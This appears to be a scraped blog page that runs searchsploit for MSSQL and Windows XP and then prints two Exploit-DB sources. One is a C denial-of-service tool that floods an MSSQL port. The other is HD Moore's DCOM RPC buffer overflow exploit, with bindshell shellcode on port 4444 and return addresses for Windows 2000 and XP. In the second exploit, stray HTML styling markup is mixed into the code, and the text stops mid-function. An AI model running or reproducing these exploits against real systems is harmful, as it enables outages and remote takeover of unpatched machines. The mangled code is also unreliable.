searchsploit

searchsploit mssql

leafpad /usr/share/exploitdb/platforms/./windows/dos/562.c

#include <stdio.h>
#include <winsock.h>

#pragma comment(lib,“ws2_32”)
u_long resolv(char*);

void main(int argc, char **argv) {
WSADATA WinsockData;
SOCKET s;
int i;
struct sockaddr_in vulh;
char buffer[700000];
for(i=0;i<700000;i+=16)memcpy(buffer+i,"\x10\x00\x00\x10\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc",16);

if (argc!=3) {
printf(" MSSQL denial of service\n");
printf(" by securma massine\n");
printf(“Cet outil a ete cree pour test ,je ne suis en aucun cas
responsable des degats que vous pouvez en faire\n”);
printf(“Syntaxe: MSSQLdos <ip> <port>\n”);
exit(1);
}

WSAStartup(0x101,&WinsockData);
s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

ZeroMemory(&vulh,sizeof(vulh));
vulh.sin_family=AF_INET;
vulh.sin_addr.s_addr=resolv(argv[1]);
vulh.sin_port=htons(atoi(argv[2]));
if (connect(s,(struct sockaddr*)&vulh,sizeof(vulh))==SOCKET_ERROR) {
printf(“Impossible de se connecter…le port est en generale 1433…\n”);
exit(1);
}

{
send(s,buffer,sizeof(buffer),0);

printf(“Data envoyes…\n”);
}
printf("\nattendez quelques secondes et verifiez que le serveur ne
repond plus.\n");
closesocket(s);
WSACleanup();
}

u_long resolv(char *host_name) {
struct in_addr addr;
struct hostent *host_ent;

if ((addr.s_addr = inet_addr(host_name)) == -1) {
if (!(host_ent = gethostbyname(host_name))) {
printf (“Erreur DNS : Impossible de résoudre l’adresse %s
!!!\n”,host_name);
exit(1);
}
CopyMemory((char *)&addr.s_addr,host_ent->h_addr,host_ent->h_length);
}
return addr.s_addr;
}

// milw0rm.com [2004-09-29]

View Code

　　查找和window XP有关的漏洞

searchsploit /xp

　　查看漏洞利用文件：

leafpad /usr/share/exploitdb/platforms/./windows/remote/66.c

Written by H D Moore <hdm [at] metasploit.com>

• Usage: ./dcom <Target ID> <Target IP>
• Targets:

•      0    Windows 2000 SP0 (english)
  

•      1    Windows 2000 SP1 (english)
  

•      2    Windows 2000 SP2 (english)
  

•      3    Windows 2000 SP3 (english)
  

•      4    Windows 2000 SP4 (english)
  

•      5    Windows XP SP0 (english)
  

•      6    Windows XP SP1 (english)
  

*/

#include <stdio.h>
#include <stdlib.h>
#include <error.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};

unsigned char *targets [] =
{
“Windows 2000 SP0 (english)”,
“Windows 2000 SP1 (english)”,
“Windows 2000 SP2 (english)”,
“Windows 2000 SP3 (english)”,
“Windows 2000 SP4 (english)”,
“Windows XP SP0 (english)”,
“Windows XP SP1 (english)”,
NULL
};

unsigned long offsets [] =
{
0x77e81674,
0x77e829ec,
0x77e824b5,
0x77e8367a,
0x77f92a9b,
0x77e9afe3,
0x77e626ba,
};

unsigned char sc[]=
“\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00”
“\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00”
“\x46\x00\x58\x00\x46\x00\x58\x00”

<span style="color: #800000;">"</span><span style="color: #800000;">\xff\xff\xff\xff</span><span style="color: #800000;">"</span> <span style="color: #008000;">/*</span><span style="color: #008000;"> return address </span><span style="color: #008000;">*/</span><span style="color: #800000;">"</span><span style="color: #800000;">\xcc\xe0\xfd\x7f</span><span style="color: #800000;">"</span> <span style="color: #008000;">/*</span><span style="color: #008000;"> primary thread data block </span><span style="color: #008000;">*/</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\xcc\xe0\xfd\x7f</span><span style="color: #800000;">"</span> <span style="color: #008000;">/*</span><span style="color: #008000;"> primary thread data block </span><span style="color: #008000;">*/</span><span style="color: #008000;">/*</span><span style="color: #008000;"> port 4444 bindshell </span><span style="color: #008000;">*/</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b</span><span style="color: #800000;">"</span>
<span style="color: #800000;">"</span><span style="color: #800000;">\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04</span><span style="color: #800000;">"</span><span style="color: #000000;">;

unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};

/ ripped from TESO code /
void shell (int sock)
{
int l;
char buf[512];
fd_set rfds;

    </span><span style="color: #0000ff;">while</span> (<span style="color: #800080;">1</span><span style="color: #000000;">) {FD_SET (</span><span style="color: #800080;">0</span>, &amp;<span style="color: #000000;">rfds);FD_SET (sock, </span>&amp;<span style="color: #000000;">rfds);</span><span style="color: #0000ff;">select</span> (sock + <span style="color: #800080;">1</span>, &amp;<span style="color: #000000;">rfds, NULL, NULL, NULL);</span><span style="color: #0000ff;">if</span> (FD_ISSET (<span style="color: #800080;">0</span>, &amp;<span style="color: #000000;">rfds)) {l </span>= read (<span style="color: #800080;">0</span>, buf, <span style="color: #0000ff;">sizeof</span><span style="color: #000000;"> (buf));</span><span style="color: #0000ff;">if</span> (l &lt;= <span style="color: #800080;">0</span><span style="color: #000000;">) {printf(</span><span style="color: #800000;">"</span><span style="color: #800000;">\n - Connection closed by local user\n</span><span style="color: #800000;">"</span><span style="color: #000000;">);exit (EXIT_FAILURE);}write (sock, buf, l);}</span><span style="color: #0000ff;">if</span> (FD_ISSET (sock, &amp;<span style="color: #000000;">rfds)) {l </span>= read (sock, buf, <span style="color: #0000ff;">sizeof</span><span style="color: #000000;"> (buf));</span><span style="color: #0000ff;">if</span> (l == <span style="color: #800080;">0</span><span style="color: #000000;">) {printf (</span><span style="color: #800000;">"</span><span style="color: #800000;">\n - Connection closed by remote host.\n</span><span style="color: #800000;">"</span><span style="color: #000000;">);exit (EXIT_FAILURE);} </span><span style="color: #0000ff;">else</span> <span style="color: #0000ff;">if</span> (l &lt; <span style="color: #800080;">0</span><span style="color: #000000;">) {printf (</span><span style="color: #800000;">"</span><span style="color: #800000;">\n - Read failure\n</span><span style="color: #800000;">"</span><span style="color: #000000;">);exit (EXIT_FAILURE);}write (</span><span style="color: #800080;">1</span><span style="color: #000000;">, buf, l);}}

}

int main(int argc, char **argv)
{

</span><span style="color: #0000ff;">int</span><span style="color: #000000;"> sock;
</span><span style="color: #0000ff;">int</span><span style="color: #000000;"> len,len1;
unsigned </span><span style="color: #0000ff;">int</span><span style="color: #000000;"> target_id;
unsigned </span><span style="color: #0000ff;">long</span><span style="color: #000000;"> ret;
</span><span style="color: #0000ff;">struct</span><span style="color: #000000;"> sockaddr_in target_ip;
unsigned </span><span style="color: #0000ff;">short</span> port = <span style="color: #800080;">135</span><span style="color: #000000;">;
unsigned </span><span style="color: #0000ff;">char</span> buf1[<span style="color: #800080;">0x1000</span><span style="color: #000000;">];
unsigned </span><span style="color: #0000ff;">char</span> buf2[<span style="color: #800080;">0x1000</span><span style="color: #000000;">];printf(</span><span style="color: #800000;">"</span><span style="color: #800000;">---------------------------------------------------------\n</span><span style="color: #800000;">"</span><span style="color: #000000;">);
printf(</span><span style="color: #800000;">"</span><span style="color: #800000;">- Remote DCOM RPC Buffer Overflow Exploit\n</span><span style="color: #800000;">"</span><span style="color: #000000;">);
printf(</span><span style="color: #800000;">"</span><span style="color: #800000;">- Original code by FlashSky and Benjurry\n</span><span style="color: #800000;">"</span><span style="color: #000000;">);
printf(</span><span style="color: #800000;">"</span><span style="color: #800000;">- Rewritten by HDM &lt;hdm [at] metasploit.com&gt;\n</span><span style="color: #800000;">"</span><span style="color: #000000;">);</span><span style="color: #0000ff;">if</span>(argc&lt;<span style="color: #800080;">3</span><span style="color: #000000;">)
{printf(</span><span style="color: #800000;">"</span><span style="color: #800000;">- Usage: %s &lt;Target ID&gt; &lt;Target IP&gt;\n</span><span style="color: #800000;">"</span>, argv[<span style="color: #800080;">0</span><span style="color: #000000;">]);printf(</span><span style="color: #800000;">"</span><span style="color: #800000;">- Targets:\n</span><span style="color: #800000;">"</span><span style="color: #000000;">);</span><span style="color: #0000ff;">for</span> (len=<span style="color: #800080;">0</span>; targets[len] != NULL; len++<span style="color: #000000;">){printf(</span><span style="color: #800000;">"</span><span style="color: #800000;">-          %d\t%s\n</span><span style="color: #800000;">"</span><span style="color: #000000;">, len, targets[len]);   }printf(</span><span style="color: #800000;">"</span><span style="color: #800000;">\n</span><span style="color: #800000;">"</span><span style="color: #000000;">);exit(</span><span style="color: #800080;">1</span><span style="color: #000000;">);
}</span><span style="color: #008000;">/*</span><span style="color: #008000;"> yeah, get over it :) </span><span style="color: #008000;">*/</span><span style="color: #000000;">
target_id </span>= atoi(argv[<span style="color: #800080;">1</span><span style="color: #000000;">]);
ret </span>=<span style="color: #000000;"> offsets[target_id];printf(</span><span style="color: #800000;">"</span><span style="color: #800000;">- Using return address of 0x%.8x\n</span><span style="color: #800000;">"</span><span style="color: #000000;">, ret);memcpy(sc</span>+<span style="color: #800080;">36</span>, (unsigned <span style="color: #0000ff;">char</span> *) &amp;ret, <span style="color: #800080;">4</span><span style="color: #000000;">);target_ip.sin_family </span>=<span style="color: #000000;"> AF_INET;
target_ip.sin_addr.s_addr </span>= inet_addr(argv[<span style="color: #800080;">2</span><span style="color: #000000;">]);
target_ip.sin_port </span>=<span style="color: #000000;"> htons(port);</span><span style="color: #0000ff;">if</span> ((sock=socket(AF_INET,SOCK_STREAM,<span style="color: #800080;">0</span>)) == -<span style="color: #800080;">1</span><span style="color: #000000;">)
{perror(</span><span style="color: #800000;">"</span><span style="color: #800000;">- Socket</span><span style="color: #800000;">"</span><span style="color: #000000;">);</span><span style="color: #0000ff;">return</span>(<span style="color: #800080;">0</span><span style="color: #000000;">);
}</span><span style="color: #0000ff;">if</span>(connect(sock,(<span style="color: #0000ff;">struct</span> sockaddr *)&amp;target_ip, <span style="color: #0000ff;">sizeof</span>(target_ip)) != <span style="color: #800080;">0</span><span style="color: #000000;">)
{perror(</span><span style="color: #800000;">"</span><span style="color: #800000;">- Connect</span><span style="color: #800000;">"</span><span style="color: #000000;">);</span><span style="color: #0000ff;">return</span>(<span style="color: #800080;">0</span><span style="color: #000000;">);
}len</span>=<span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(sc);
memcpy(buf2,request1,</span><span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(request1));
len1</span>=<span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(request1);</span>*(unsigned <span style="color: #0000ff;">long</span> *)(request2)=*(unsigned <span style="color: #0000ff;">long</span> *)(request2)+<span style="color: #0000ff;">sizeof</span>(sc)/<span style="color: #800080;">2</span><span style="color: #000000;">;
</span>*(unsigned <span style="color: #0000ff;">long</span> *)(request2+<span style="color: #800080;">8</span>)=*(unsigned <span style="color: #0000ff;">long</span> *)(request2+<span style="color: #800080;">8</span>)+<span style="color: #0000ff;">sizeof</span>(sc)/<span style="color: #800080;">2</span><span style="color: #000000;">;memcpy(buf2</span>+len1,request2,<span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(request2));
len1</span>=len1+<span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(request2);
memcpy(buf2</span>+len1,sc,<span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(sc));
len1</span>=len1+<span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(sc);
memcpy(buf2</span>+len1,request3,<span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(request3));
len1</span>=len1+<span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(request3);
memcpy(buf2</span>+len1,request4,<span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(request4));
len1</span>=len1+<span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(request4);</span>*(unsigned <span style="color: #0000ff;">long</span> *)(buf2+<span style="color: #800080;">8</span>)=*(unsigned <span style="color: #0000ff;">long</span> *)(buf2+<span style="color: #800080;">8</span>)+<span style="color: #0000ff;">sizeof</span>(sc)-<span style="color: #800080;">0xc</span><span style="color: #000000;">;</span>*(unsigned <span style="color: #0000ff;">long</span> *)(buf2+<span style="color: #800080;">0x10</span>)=*(unsigned <span style="color: #0000ff;">long</span> *)(buf2+<span style="color: #800080;">0x10</span>)+<span style="color: #0000ff;">sizeof</span>(sc)-<span style="color: #800080;">0xc</span><span style="color: #000000;">;
</span>*(unsigned <span style="color: #0000ff;">long</span> *)(buf2+<span style="color: #800080;">0x80</span>)=*(unsigned <span style="color: #0000ff;">long</span> *)(buf2+<span style="color: #800080;">0x80</span>)+<span style="color: #0000ff;">sizeof</span>(sc)-<span style="color: #800080;">0xc</span><span style="color: #000000;">;
</span>*(unsigned <span style="color: #0000ff;">long</span> *)(buf2+<span style="color: #800080;">0x84</span>)=*(unsigned <span style="color: #0000ff;">long</span> *)(buf2+<span style="color: #800080;">0x84</span>)+<span style="color: #0000ff;">sizeof</span>(sc)-<span style="color: #800080;">0xc</span><span style="color: #000000;">;
